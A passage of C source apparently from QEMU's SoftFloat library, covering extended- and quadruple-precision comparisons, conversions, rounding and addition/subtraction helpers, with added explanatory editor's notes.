            && (uint64_t) (extractFloatx80Frac(a) << 1))
        || (extractFloatx80Exp(b) == 0x7FFF
            && (uint64_t) (extractFloatx80Frac(b) << 1))
       ) {
        float_raise(float_flag_invalid, status);
        return 0;
    }
    aSign = extractFloatx80Sign( a );
    bSign = extractFloatx80Sign( b );
    if ( aSign != bSign ) {
        return
               aSign
            && (    ( ( (uint16_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low )
                 != 0 );
    }
    return
          aSign ? lt128( b.high, b.low, a.high, a.low )
        : lt128( a.high, a.low, b.high, b.low );
}

/*----------------------------------------------------------------------------
| Returns 1 if the extended double-precision floating-point values `a' and `b'
| cannot be compared, and 0 otherwise.  The invalid exception is raised if
| either operand is a NaN.  The comparison is performed according to the
| IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

int floatx80_unordered(floatx80 a, floatx80 b, float_status *status)
{
    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)
        || (extractFloatx80Exp(a) == 0x7FFF
            && (uint64_t) (extractFloatx80Frac(a) << 1))
        || (extractFloatx80Exp(b) == 0x7FFF
            && (uint64_t) (extractFloatx80Frac(b) << 1))
       ) {
        float_raise(float_flag_invalid, status);
        return 1;
    }
    return 0;
}

/*----------------------------------------------------------------------------
| Returns 1 if the extended double-precision floating-point value `a' is
| equal to the corresponding value `b', and 0 otherwise.  Quiet NaNs do not
| cause an exception.  The comparison is performed according to the IEC/IEEE
| Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

int floatx80_eq_quiet(floatx80 a, floatx80 b, float_status *status)
{
    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) {
        float_raise(float_flag_invalid, status);
        return 0;
    }
    if (    (    ( extractFloatx80Exp( a ) == 0x7FFF )
              && (uint64_t) ( extractFloatx80Frac( a )<<1 ) )
         || (    ( extractFloatx80Exp( b ) == 0x7FFF )
              && (uint64_t) ( extractFloatx80Frac( b )<<1 ) )
       ) {
        if (floatx80_is_signaling_nan(a, status)
         || floatx80_is_signaling_nan(b, status)) {
            float_raise(float_flag_invalid, status);
        }
        return 0;
    }
    return
           ( a.low == b.low )
        && (    ( a.high == b.high )
             || (    ( a.low == 0 )
                  && ( (uint16_t) ( ( a.high | b.high )<<1 ) == 0 ) )
           );
}
/*----------------------------------------------------------------------------
| Returns 1 if the extended double-precision floating-point value `a' is less
| than or equal to the corresponding value `b', and 0 otherwise.  Quiet NaNs
| do not cause an exception.  Otherwise, the comparison is performed according
| to the IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

int floatx80_le_quiet(floatx80 a, floatx80 b, float_status *status)
{
    flag aSign, bSign;

    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) {
        float_raise(float_flag_invalid, status);
        return 0;
    }
    if (    (    ( extractFloatx80Exp( a ) == 0x7FFF )
              && (uint64_t) ( extractFloatx80Frac( a )<<1 ) )
         || (    ( extractFloatx80Exp( b ) == 0x7FFF )
              && (uint64_t) ( extractFloatx80Frac( b )<<1 ) )
       ) {
        if (floatx80_is_signaling_nan(a, status)
         || floatx80_is_signaling_nan(b, status)) {
            float_raise(float_flag_invalid, status);
        }
        return 0;
    }
    aSign = extractFloatx80Sign( a );
    bSign = extractFloatx80Sign( b );
    if ( aSign != bSign ) {
        return
               aSign
            || (    ( ( (uint16_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low )
                 == 0 );
    }
    return
          aSign ? le128( b.high, b.low, a.high, a.low )
        : le128( a.high, a.low, b.high, b.low );
}

/*----------------------------------------------------------------------------
| Returns 1 if the extended double-precision floating-point value `a' is less
| than the corresponding value `b', and 0 otherwise.  Quiet NaNs do not cause
| an exception.  Otherwise, the comparison is performed according to the
| IEC/IEEE Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

int floatx80_lt_quiet(floatx80 a, floatx80 b, float_status *status)
{
    flag aSign, bSign;

    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) {
        float_raise(float_flag_invalid, status);
        return 0;
    }
    if (    (    ( extractFloatx80Exp( a ) == 0x7FFF )
              && (uint64_t) ( extractFloatx80Frac( a )<<1 ) )
         || (    ( extractFloatx80Exp( b ) == 0x7FFF )
              && (uint64_t) ( extractFloatx80Frac( b )<<1 ) )
       ) {
        if (floatx80_is_signaling_nan(a, status)
         || floatx80_is_signaling_nan(b, status)) {
            float_raise(float_flag_invalid, status);
        }
        return 0;
    }
    aSign = extractFloatx80Sign( a );
    bSign = extractFloatx80Sign( b );
    if ( aSign != bSign ) {
        return
               aSign
            && (    ( ( (uint16_t) ( ( a.high | b.high )<<1 ) ) | a.low | b.low )
                 != 0 );
    }
    return
          aSign ? lt128( b.high, b.low, a.high, a.low )
        : lt128( a.high, a.low, b.high, b.low );
}

/*----------------------------------------------------------------------------
| Returns 1 if the extended double-precision floating-point values `a' and `b'
| cannot be compared, and 0 otherwise.  Quiet NaNs do not cause an exception.
| The comparison is performed according to the IEC/IEEE Standard for Binary
| Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

int floatx80_unordered_quiet(floatx80 a, floatx80 b, float_status *status)
{
    if (floatx80_invalid_encoding(a) || floatx80_invalid_encoding(b)) {
        float_raise(float_flag_invalid, status);
        return 1;
    }
    if (    (    ( extractFloatx80Exp( a ) == 0x7FFF )
              && (uint64_t) ( extractFloatx80Frac( a )<<1 ) )
         || (    ( extractFloatx80Exp( b ) == 0x7FFF )
              && (uint64_t) ( extractFloatx80Frac( b )<<1 ) )
       ) {
        if (floatx80_is_signaling_nan(a, status)
         || floatx80_is_signaling_nan(b, status)) {
            float_raise(float_flag_invalid, status);
        }
        return 1;
    }
    return 0;
}
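/*----------------------------------------------------------------------------
| Editor's note (illustrative): the *_quiet comparison variants differ from
| floatx80_eq()/floatx80_le()/floatx80_lt() only in their NaN handling: a
| quiet NaN operand makes the result 0 (or 1 for "unordered") without raising
| the invalid exception, which these variants raise only for signaling NaNs
| and invalid encodings.
*----------------------------------------------------------------------------*/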
/*----------------------------------------------------------------------------
| Returns the result of converting the quadruple-precision floating-point
| value `a' to the 32-bit two's complement integer format.  The conversion
| is performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic---which means in particular that the conversion is rounded
| according to the current rounding mode.  If `a' is a NaN, the largest
| positive integer is returned.  Otherwise, if the conversion overflows, the
| largest integer with the same sign as `a' is returned.
*----------------------------------------------------------------------------*/

int32_t float128_to_int32(float128 a, float_status *status)
{
    flag aSign;
    int32_t aExp, shiftCount;
    uint64_t aSig0, aSig1;

    aSig1 = extractFloat128Frac1( a );
    aSig0 = extractFloat128Frac0( a );
    aExp = extractFloat128Exp( a );
    aSign = extractFloat128Sign( a );
    if ( ( aExp == 0x7FFF ) && ( aSig0 | aSig1 ) ) aSign = 0;
    if ( aExp ) aSig0 |= UINT64_C(0x0001000000000000);
    aSig0 |= ( aSig1 != 0 );
    shiftCount = 0x4028 - aExp;
    if ( 0 < shiftCount ) shift64RightJamming( aSig0, shiftCount, &aSig0 );
    return roundAndPackInt32(aSign, aSig0, status);
}

/*----------------------------------------------------------------------------
| Returns the result of converting the quadruple-precision floating-point
| value `a' to the 32-bit two's complement integer format.  The conversion
| is performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic, except that the conversion is always rounded toward zero.  If
| `a' is a NaN, the largest positive integer is returned.  Otherwise, if the
| conversion overflows, the largest integer with the same sign as `a' is
| returned.
*----------------------------------------------------------------------------*/

int32_t float128_to_int32_round_to_zero(float128 a, float_status *status)
{
    flag aSign;
    int32_t aExp, shiftCount;
    uint64_t aSig0, aSig1, savedASig;
    int32_t z;

    aSig1 = extractFloat128Frac1( a );
    aSig0 = extractFloat128Frac0( a );
    aExp = extractFloat128Exp( a );
    aSign = extractFloat128Sign( a );
    aSig0 |= ( aSig1 != 0 );
    if ( 0x401E < aExp ) {
        if ( ( aExp == 0x7FFF ) && aSig0 ) aSign = 0;
        goto invalid;
    }
    else if ( aExp < 0x3FFF ) {
        if (aExp || aSig0) {
            status->float_exception_flags |= float_flag_inexact;
        }
        return 0;
    }
    aSig0 |= UINT64_C(0x0001000000000000);
    shiftCount = 0x402F - aExp;
    savedASig = aSig0;
    aSig0 >>= shiftCount;
    z = aSig0;
    if ( aSign ) z = - z;
    if ( ( z < 0 ) ^ aSign ) {
 invalid:
        float_raise(float_flag_invalid, status);
        return aSign ? INT32_MIN : INT32_MAX;
    }
    if ( ( aSig0<<shiftCount ) != savedASig ) {
        status->float_exception_flags |= float_flag_inexact;
    }
    return z;
}
/*----------------------------------------------------------------------------
| Returns the result of converting the quadruple-precision floating-point
| value `a' to the 64-bit two's complement integer format.  The conversion
| is performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic---which means in particular that the conversion is rounded
| according to the current rounding mode.  If `a' is a NaN, the largest
| positive integer is returned.  Otherwise, if the conversion overflows, the
| largest integer with the same sign as `a' is returned.
*----------------------------------------------------------------------------*/

int64_t float128_to_int64(float128 a, float_status *status)
{
    flag aSign;
    int32_t aExp, shiftCount;
    uint64_t aSig0, aSig1;

    aSig1 = extractFloat128Frac1( a );
    aSig0 = extractFloat128Frac0( a );
    aExp = extractFloat128Exp( a );
    aSign = extractFloat128Sign( a );
    if ( aExp ) aSig0 |= UINT64_C(0x0001000000000000);
    shiftCount = 0x402F - aExp;
    if ( shiftCount <= 0 ) {
        if ( 0x403E < aExp ) {
            float_raise(float_flag_invalid, status);
            if (    ! aSign
                 || (    ( aExp == 0x7FFF )
                      && (    aSig1
                           || ( aSig0 != UINT64_C(0x0001000000000000) ) )
                    )
               ) {
                return INT64_MAX;
            }
            return INT64_MIN;
        }
        shortShift128Left( aSig0, aSig1, - shiftCount, &aSig0, &aSig1 );
    }
    else {
        shift64ExtraRightJamming( aSig0, aSig1, shiftCount, &aSig0, &aSig1 );
    }
    return roundAndPackInt64(aSign, aSig0, aSig1, status);
}

/*----------------------------------------------------------------------------
| Returns the result of converting the quadruple-precision floating-point
| value `a' to the 64-bit two's complement integer format.  The conversion
| is performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic, except that the conversion is always rounded toward zero.
| If `a' is a NaN, the largest positive integer is returned.  Otherwise, if
| the conversion overflows, the largest integer with the same sign as `a' is
| returned.
*----------------------------------------------------------------------------*/

int64_t float128_to_int64_round_to_zero(float128 a, float_status *status)
{
    flag aSign;
    int32_t aExp, shiftCount;
    uint64_t aSig0, aSig1;
    int64_t z;

    aSig1 = extractFloat128Frac1( a );
    aSig0 = extractFloat128Frac0( a );
    aExp = extractFloat128Exp( a );
    aSign = extractFloat128Sign( a );
    if ( aExp ) aSig0 |= UINT64_C(0x0001000000000000);
    shiftCount = aExp - 0x402F;
    if ( 0 < shiftCount ) {
        if ( 0x403E <= aExp ) {
            aSig0 &= UINT64_C(0x0000FFFFFFFFFFFF);
            if (    ( a.high == UINT64_C(0xC03E000000000000) )
                 && ( aSig1 < UINT64_C(0x0002000000000000) ) ) {
                if (aSig1) {
                    status->float_exception_flags |= float_flag_inexact;
                }
            }
            else {
                float_raise(float_flag_invalid, status);
                if ( ! aSign || ( ( aExp == 0x7FFF ) && ( aSig0 | aSig1 ) ) ) {
                    return INT64_MAX;
                }
            }
            return INT64_MIN;
        }
        z = ( aSig0<<shiftCount ) | ( aSig1>>( ( - shiftCount ) & 63 ) );
        if ( (uint64_t) ( aSig1<<shiftCount ) ) {
            status->float_exception_flags |= float_flag_inexact;
        }
    }
    else {
        if ( aExp < 0x3FFF ) {
            if ( aExp | aSig0 | aSig1 ) {
                status->float_exception_flags |= float_flag_inexact;
            }
            return 0;
        }
        z = aSig0>>( - shiftCount );
        if (    aSig1
             || ( shiftCount && (uint64_t) ( aSig0<<( shiftCount & 63 ) ) ) ) {
            status->float_exception_flags |= float_flag_inexact;
        }
    }
    if ( aSign ) z = - z;
    return z;
}
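/*----------------------------------------------------------------------------
| Editor's note (illustrative): 0x402F is the biased quadruple-precision
| exponent at which the 49-bit high significand word (implicit bit at
| position 48 of aSig0) is exactly the integer part, with aSig1 holding pure
| fraction.  shiftCount = 0x402F - aExp therefore measures how far the
| 113-bit significand must move right (or left, when negative) to align the
| binary point for the 64-bit integer conversion.
*----------------------------------------------------------------------------*/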
/*----------------------------------------------------------------------------
| Returns the result of converting the quadruple-precision floating-point
| value `a' to the 64-bit unsigned integer format.  The conversion is
| performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic---which means in particular that the conversion is rounded
| according to the current rounding mode.  If `a' is a NaN, the largest
| positive integer is returned.  If the conversion overflows, the
| largest unsigned integer is returned.  If 'a' is negative, the value is
| rounded and zero is returned; negative values that do not round to zero
| will raise the inexact exception.
*----------------------------------------------------------------------------*/

uint64_t float128_to_uint64(float128 a, float_status *status)
{
    flag aSign;
    int aExp;
    int shiftCount;
    uint64_t aSig0, aSig1;

    aSig0 = extractFloat128Frac0(a);
    aSig1 = extractFloat128Frac1(a);
    aExp = extractFloat128Exp(a);
    aSign = extractFloat128Sign(a);
    if (aSign && (aExp > 0x3FFE)) {
        float_raise(float_flag_invalid, status);
        if (float128_is_any_nan(a)) {
            return UINT64_MAX;
        } else {
            return 0;
        }
    }
    if (aExp) {
        aSig0 |= UINT64_C(0x0001000000000000);
    }
    shiftCount = 0x402F - aExp;
    if (shiftCount <= 0) {
        if (0x403E < aExp) {
            float_raise(float_flag_invalid, status);
            return UINT64_MAX;
        }
        shortShift128Left(aSig0, aSig1, -shiftCount, &aSig0, &aSig1);
    } else {
        shift64ExtraRightJamming(aSig0, aSig1, shiftCount, &aSig0, &aSig1);
    }
    return roundAndPackUint64(aSign, aSig0, aSig1, status);
}

uint64_t float128_to_uint64_round_to_zero(float128 a, float_status *status)
{
    uint64_t v;
    signed char current_rounding_mode = status->float_rounding_mode;

    set_float_rounding_mode(float_round_to_zero, status);
    v = float128_to_uint64(a, status);
    set_float_rounding_mode(current_rounding_mode, status);
    return v;
}

/*----------------------------------------------------------------------------
| Returns the result of converting the quadruple-precision floating-point
| value `a' to the 32-bit unsigned integer format.  The conversion
| is performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic except that the conversion is always rounded toward zero.
| If `a' is a NaN, the largest positive integer is returned.  Otherwise,
| if the conversion overflows, the largest unsigned integer is returned.
| If 'a' is negative, the value is rounded and zero is returned; negative
| values that do not round to zero will raise the inexact exception.
*----------------------------------------------------------------------------*/

uint32_t float128_to_uint32_round_to_zero(float128 a, float_status *status)
{
    uint64_t v;
    uint32_t res;
    int old_exc_flags = get_float_exception_flags(status);

    v = float128_to_uint64_round_to_zero(a, status);
    if (v > 0xffffffff) {
        res = 0xffffffff;
    } else {
        return v;
    }
    set_float_exception_flags(old_exc_flags, status);
    float_raise(float_flag_invalid, status);
    return res;
}
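/*----------------------------------------------------------------------------
| Editor's note (illustrative): float128_to_uint64_round_to_zero() is a thin
| wrapper that temporarily forces float_round_to_zero and then restores the
| caller's rounding mode, reusing float128_to_uint64() instead of duplicating
| its overflow and NaN handling.
*----------------------------------------------------------------------------*/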
/*----------------------------------------------------------------------------
| Returns the result of converting the quadruple-precision floating-point
| value `a' to the 32-bit unsigned integer format.  The conversion is
| performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic---which means in particular that the conversion is rounded
| according to the current rounding mode.  If `a' is a NaN, the largest
| positive integer is returned.  If the conversion overflows, the
| largest unsigned integer is returned.  If 'a' is negative, the value is
| rounded and zero is returned; negative values that do not round to zero
| will raise the inexact exception.
*----------------------------------------------------------------------------*/

uint32_t float128_to_uint32(float128 a, float_status *status)
{
    uint64_t v;
    uint32_t res;
    int old_exc_flags = get_float_exception_flags(status);

    v = float128_to_uint64(a, status);
    if (v > 0xffffffff) {
        res = 0xffffffff;
    } else {
        return v;
    }
    set_float_exception_flags(old_exc_flags, status);
    float_raise(float_flag_invalid, status);
    return res;
}

/*----------------------------------------------------------------------------
| Returns the result of converting the quadruple-precision floating-point
| value `a' to the single-precision floating-point format.  The conversion
| is performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic.
*----------------------------------------------------------------------------*/

float32 float128_to_float32(float128 a, float_status *status)
{
    flag aSign;
    int32_t aExp;
    uint64_t aSig0, aSig1;
    uint32_t zSig;

    aSig1 = extractFloat128Frac1( a );
    aSig0 = extractFloat128Frac0( a );
    aExp = extractFloat128Exp( a );
    aSign = extractFloat128Sign( a );
    if ( aExp == 0x7FFF ) {
        if ( aSig0 | aSig1 ) {
            return commonNaNToFloat32(float128ToCommonNaN(a, status), status);
        }
        return packFloat32( aSign, 0xFF, 0 );
    }
    aSig0 |= ( aSig1 != 0 );
    shift64RightJamming( aSig0, 18, &aSig0 );
    zSig = aSig0;
    if ( aExp || zSig ) {
        zSig |= 0x40000000;
        aExp -= 0x3F81;
    }
    return roundAndPackFloat32(aSign, aExp, zSig, status);
}

/*----------------------------------------------------------------------------
| Returns the result of converting the quadruple-precision floating-point
| value `a' to the double-precision floating-point format.  The conversion
| is performed according to the IEC/IEEE Standard for Binary Floating-Point
| Arithmetic.
*----------------------------------------------------------------------------*/

float64 float128_to_float64(float128 a, float_status *status)
{
    flag aSign;
    int32_t aExp;
    uint64_t aSig0, aSig1;

    aSig1 = extractFloat128Frac1( a );
    aSig0 = extractFloat128Frac0( a );
    aExp = extractFloat128Exp( a );
    aSign = extractFloat128Sign( a );
    if ( aExp == 0x7FFF ) {
        if ( aSig0 | aSig1 ) {
            return commonNaNToFloat64(float128ToCommonNaN(a, status), status);
        }
        return packFloat64( aSign, 0x7FF, 0 );
    }
    shortShift128Left( aSig0, aSig1, 14, &aSig0, &aSig1 );
    aSig0 |= ( aSig1 != 0 );
    if ( aExp || aSig0 ) {
        aSig0 |= UINT64_C(0x4000000000000000);
        aExp -= 0x3C01;
    }
    return roundAndPackFloat64(aSign, aExp, aSig0, status);
}
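/*----------------------------------------------------------------------------
| Editor's note (illustrative): both 32-bit unsigned conversions narrow
| through the 64-bit path.  The exception flags are saved first so that, on
| overflow past 0xffffffff, the flags set by the 64-bit conversion can be
| rolled back and replaced by a single invalid exception.
*----------------------------------------------------------------------------*/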
/*----------------------------------------------------------------------------
| Returns the result of converting the quadruple-precision floating-point
| value `a' to the extended double-precision floating-point format.  The
| conversion is performed according to the IEC/IEEE Standard for Binary
| Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

floatx80 float128_to_floatx80(float128 a, float_status *status)
{
    flag aSign;
    int32_t aExp;
    uint64_t aSig0, aSig1;

    aSig1 = extractFloat128Frac1( a );
    aSig0 = extractFloat128Frac0( a );
    aExp = extractFloat128Exp( a );
    aSign = extractFloat128Sign( a );
    if ( aExp == 0x7FFF ) {
        if ( aSig0 | aSig1 ) {
            return commonNaNToFloatx80(float128ToCommonNaN(a, status), status);
        }
        return packFloatx80(aSign, floatx80_infinity_high,
                            floatx80_infinity_low);
    }
    if ( aExp == 0 ) {
        if ( ( aSig0 | aSig1 ) == 0 ) return packFloatx80( aSign, 0, 0 );
        normalizeFloat128Subnormal( aSig0, aSig1, &aExp, &aSig0, &aSig1 );
    }
    else {
        aSig0 |= UINT64_C(0x0001000000000000);
    }
    shortShift128Left( aSig0, aSig1, 15, &aSig0, &aSig1 );
    return roundAndPackFloatx80(80, aSign, aExp, aSig0, aSig1, status);
}
/*----------------------------------------------------------------------------
| Rounds the quadruple-precision floating-point value `a' to an integer, and
| returns the result as a quadruple-precision floating-point value.  The
| operation is performed according to the IEC/IEEE Standard for Binary
| Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

float128 float128_round_to_int(float128 a, float_status *status)
{
    flag aSign;
    int32_t aExp;
    uint64_t lastBitMask, roundBitsMask;
    float128 z;

    aExp = extractFloat128Exp( a );
    if ( 0x402F <= aExp ) {
        if ( 0x406F <= aExp ) {
            if (    ( aExp == 0x7FFF )
                 && ( extractFloat128Frac0( a ) | extractFloat128Frac1( a ) )
               ) {
                return propagateFloat128NaN(a, a, status);
            }
            return a;
        }
        lastBitMask = 1;
        lastBitMask = ( lastBitMask<<( 0x406E - aExp ) )<<1;
        roundBitsMask = lastBitMask - 1;
        z = a;
        switch (status->float_rounding_mode) {
        case float_round_nearest_even:
            if ( lastBitMask ) {
                add128( z.high, z.low, 0, lastBitMask>>1, &z.high, &z.low );
                if ( ( z.low & roundBitsMask ) == 0 ) z.low &= ~ lastBitMask;
            }
            else {
                if ( (int64_t) z.low < 0 ) {
                    ++z.high;
                    if ( (uint64_t) ( z.low<<1 ) == 0 ) z.high &= ~1;
                }
            }
            break;
        case float_round_ties_away:
            if (lastBitMask) {
                add128(z.high, z.low, 0, lastBitMask >> 1, &z.high, &z.low);
            } else {
                if ((int64_t) z.low < 0) {
                    ++z.high;
                }
            }
            break;
        case float_round_to_zero:
            break;
        case float_round_up:
            if (!extractFloat128Sign(z)) {
                add128(z.high, z.low, 0, roundBitsMask, &z.high, &z.low);
            }
            break;
        case float_round_down:
            if (extractFloat128Sign(z)) {
                add128(z.high, z.low, 0, roundBitsMask, &z.high, &z.low);
            }
            break;
        case float_round_to_odd:
            /*
             * Note that if lastBitMask == 0, the last bit is the lsb
             * of high, and roundBitsMask == -1.
             */
            if ((lastBitMask ? z.low & lastBitMask : z.high & 1) == 0) {
                add128(z.high, z.low, 0, roundBitsMask, &z.high, &z.low);
            }
            break;
        default:
            abort();
        }
        z.low &= ~ roundBitsMask;
    }
    else {
        if ( aExp < 0x3FFF ) {
            if ( ( ( (uint64_t) ( a.high<<1 ) ) | a.low ) == 0 ) return a;
            status->float_exception_flags |= float_flag_inexact;
            aSign = extractFloat128Sign( a );
            switch (status->float_rounding_mode) {
            case float_round_nearest_even:
                if (    ( aExp == 0x3FFE )
                     && (   extractFloat128Frac0( a )
                          | extractFloat128Frac1( a ) )
                   ) {
                    return packFloat128( aSign, 0x3FFF, 0, 0 );
                }
                break;
            case float_round_ties_away:
                if (aExp == 0x3FFE) {
                    return packFloat128(aSign, 0x3FFF, 0, 0);
                }
                break;
            case float_round_down:
                return aSign ? packFloat128( 1, 0x3FFF, 0, 0 )
                    : packFloat128( 0, 0, 0, 0 );
            case float_round_up:
                return aSign ? packFloat128( 1, 0, 0, 0 )
                    : packFloat128( 0, 0x3FFF, 0, 0 );
            case float_round_to_odd:
                return packFloat128(aSign, 0x3FFF, 0, 0);
            }
            return packFloat128( aSign, 0, 0, 0 );
        }
        lastBitMask = 1;
        lastBitMask <<= 0x402F - aExp;
        roundBitsMask = lastBitMask - 1;
        z.low = 0;
        z.high = a.high;
        switch (status->float_rounding_mode) {
        case float_round_nearest_even:
            z.high += lastBitMask>>1;
            if ( ( ( z.high & roundBitsMask ) | a.low ) == 0 ) {
                z.high &= ~ lastBitMask;
            }
            break;
        case float_round_ties_away:
            z.high += lastBitMask>>1;
            break;
        case float_round_to_zero:
            break;
        case float_round_up:
            if (!extractFloat128Sign(z)) {
                z.high |= ( a.low != 0 );
                z.high += roundBitsMask;
            }
            break;
        case float_round_down:
            if (extractFloat128Sign(z)) {
                z.high |= (a.low != 0);
                z.high += roundBitsMask;
            }
            break;
        case float_round_to_odd:
            if ((z.high & lastBitMask) == 0) {
                z.high |= (a.low != 0);
                z.high += roundBitsMask;
            }
            break;
        default:
            abort();
        }
        z.high &= ~ roundBitsMask;
    }
    if ( ( z.low != a.low ) || ( z.high != a.high ) ) {
        status->float_exception_flags |= float_flag_inexact;
    }
    return z;
}

/*----------------------------------------------------------------------------
| Returns the result of adding the absolute values of the quadruple-precision
| floating-point values `a' and `b'.  If `zSign' is 1, the sum is negated
| before being returned.  `zSign' is ignored if the result is a NaN.
| The addition is performed according to the IEC/IEEE Standard for Binary
| Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

static float128 addFloat128Sigs(float128 a, float128 b, flag zSign,
                                float_status *status)
{
    int32_t aExp, bExp, zExp;
    uint64_t aSig0, aSig1, bSig0, bSig1, zSig0, zSig1, zSig2;
    int32_t expDiff;

    aSig1 = extractFloat128Frac1( a );
    aSig0 = extractFloat128Frac0( a );
    aExp = extractFloat128Exp( a );
    bSig1 = extractFloat128Frac1( b );
    bSig0 = extractFloat128Frac0( b );
    bExp = extractFloat128Exp( b );
    expDiff = aExp - bExp;
    if ( 0 < expDiff ) {
        if ( aExp == 0x7FFF ) {
            if (aSig0 | aSig1) {
                return propagateFloat128NaN(a, b, status);
            }
            return a;
        }
        if ( bExp == 0 ) {
            --expDiff;
        }
        else {
            bSig0 |= UINT64_C(0x0001000000000000);
        }
        shift128ExtraRightJamming(
            bSig0, bSig1, 0, expDiff, &bSig0, &bSig1, &zSig2 );
        zExp = aExp;
    }
    else if ( expDiff < 0 ) {
        if ( bExp == 0x7FFF ) {
            if (bSig0 | bSig1) {
                return propagateFloat128NaN(a, b, status);
            }
            return packFloat128( zSign, 0x7FFF, 0, 0 );
        }
        if ( aExp == 0 ) {
            ++expDiff;
        }
        else {
            aSig0 |= UINT64_C(0x0001000000000000);
        }
        shift128ExtraRightJamming(
            aSig0, aSig1, 0, - expDiff, &aSig0, &aSig1, &zSig2 );
        zExp = bExp;
    }
    else {
        if ( aExp == 0x7FFF ) {
            if ( aSig0 | aSig1 | bSig0 | bSig1 ) {
                return propagateFloat128NaN(a, b, status);
            }
            return a;
        }
        add128( aSig0, aSig1, bSig0, bSig1, &zSig0, &zSig1 );
        if ( aExp == 0 ) {
            if (status->flush_to_zero) {
                if (zSig0 | zSig1) {
                    float_raise(float_flag_output_denormal, status);
                }
                return packFloat128(zSign, 0, 0, 0);
            }
            return packFloat128( zSign, 0, zSig0, zSig1 );
        }
        zSig2 = 0;
        zSig0 |= UINT64_C(0x0002000000000000);
        zExp = aExp;
        goto shiftRight1;
    }
    aSig0 |= UINT64_C(0x0001000000000000);
    add128( aSig0, aSig1, bSig0, bSig1, &zSig0, &zSig1 );
    --zExp;
    if ( zSig0 < UINT64_C(0x0002000000000000) ) goto roundAndPack;
    ++zExp;
 shiftRight1:
    shift128ExtraRightJamming(
        zSig0, zSig1, zSig2, 1, &zSig0, &zSig1, &zSig2 );
 roundAndPack:
    return roundAndPackFloat128(zSign, zExp, zSig0, zSig1, zSig2, status);
}
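/*----------------------------------------------------------------------------
| Editor's note (illustrative): in addFloat128Sigs() the third significand
| word zSig2 collects the bits shifted out while aligning the smaller
| operand; shift128ExtraRightJamming() jams any lost ones into it, and
| roundAndPackFloat128() consumes zSig2 as the round/sticky input.
*----------------------------------------------------------------------------*/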
/*----------------------------------------------------------------------------
| Returns the result of subtracting the absolute values of the quadruple-
| precision floating-point values `a' and `b'.  If `zSign' is 1, the
| difference is negated before being returned.  `zSign' is ignored if the
| result is a NaN.  The subtraction is performed according to the IEC/IEEE
| Standard for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

static float128 subFloat128Sigs(float128 a, float128 b, flag zSign,
                                float_status *status)
{
    int32_t aExp, bExp, zExp;
    uint64_t aSig0, aSig1, bSig0, bSig1, zSig0, zSig1;
    int32_t expDiff;

    aSig1 = extractFloat128Frac1( a );
    aSig0 = extractFloat128Frac0( a );
    aExp = extractFloat128Exp( a );
    bSig1 = extractFloat128Frac1( b );
    bSig0 = extractFloat128Frac0( b );
    bExp = extractFloat128Exp( b );
    expDiff = aExp - bExp;
    shortShift128Left( aSig0, aSig1, 14, &aSig0, &aSig1 );
    shortShift128Left( bSig0, bSig1, 14, &bSig0, &bSig1 );
    if ( 0 < expDiff ) goto aExpBigger;
    if ( expDiff < 0 ) goto bExpBigger;
    if ( aExp == 0x7FFF ) {
        if ( aSig0 | aSig1 | bSig0 | bSig1 ) {
            return propagateFloat128NaN(a, b, status);
        }
        float_raise(float_flag_invalid, status);
        return float128_default_nan(status);
    }
    if ( aExp == 0 ) {
        aExp = 1;
        bExp = 1;
    }
    if ( bSig0 < aSig0 ) goto aBigger;
    if ( aSig0 < bSig0 ) goto bBigger;
    if ( bSig1 < aSig1 ) goto aBigger;
    if ( aSig1 < bSig1 ) goto bBigger;
    return packFloat128(status->float_rounding_mode == float_round_down,
                        0, 0, 0);
 bExpBigger:
    if ( bExp == 0x7FFF ) {
        if (bSig0 | bSig1) {
            return propagateFloat128NaN(a, b, status);
        }
        return packFloat128( zSign ^ 1, 0x7FFF, 0, 0 );
    }
    if ( aExp == 0 ) {
        ++expDiff;
    }
    else {
        aSig0 |= UINT64_C(0x4000000000000000);
    }
    shift128RightJamming( aSig0, aSig1, - expDiff, &aSig0, &aSig1 );
    bSig0 |= UINT64_C(0x4000000000000000);
 bBigger:
    sub128( bSig0, bSig1, aSig0, aSig1, &zSig0, &zSig1 );
    zExp = bExp;
    zSign ^= 1;
    goto normalizeRoundAndPack;
 aExpBigger:
    if ( aExp == 0x7FFF ) {
        if (aSig0 | aSig1) {
            return propagateFloat128NaN(a, b, status);
        }
        return a;
    }
    if ( bExp == 0 ) {
        --expDiff;
    }
    else {
        bSig0 |= UINT64_C(0x4000000000000000);
    }
    shift128RightJamming( bSig0, bSig1, expDiff, &bSig0, &bSig1 );
    aSig0 |= UINT64_C(0x4000000000000000);
 aBigger:
    sub128( aSig0, aSig1, bSig0, bSig1, &zSig0, &zSig1 );
    zExp = aExp;
 normalizeRoundAndPack:
    --zExp;
    return normalizeRoundAndPackFloat128(zSign, zExp - 14, zSig0, zSig1,
                                         status);
}

/*----------------------------------------------------------------------------
| Returns the result of adding the quadruple-precision floating-point values
| `a' and `b'.  The operation is performed according to the IEC/IEEE Standard
| for Binary Floating-Point Arithmetic.
*----------------------------------------------------------------------------*/

float128 float128_add(float128 a, float128 b, float_status *status)
{
    flag aSign, bSign;

    aSign = extractFloat128Sign( a );
    bSign = extractFloat128Sign( b );
    if ( aSign == bSign ) {
        return addFloat128Sigs(a, b, aSign, status);
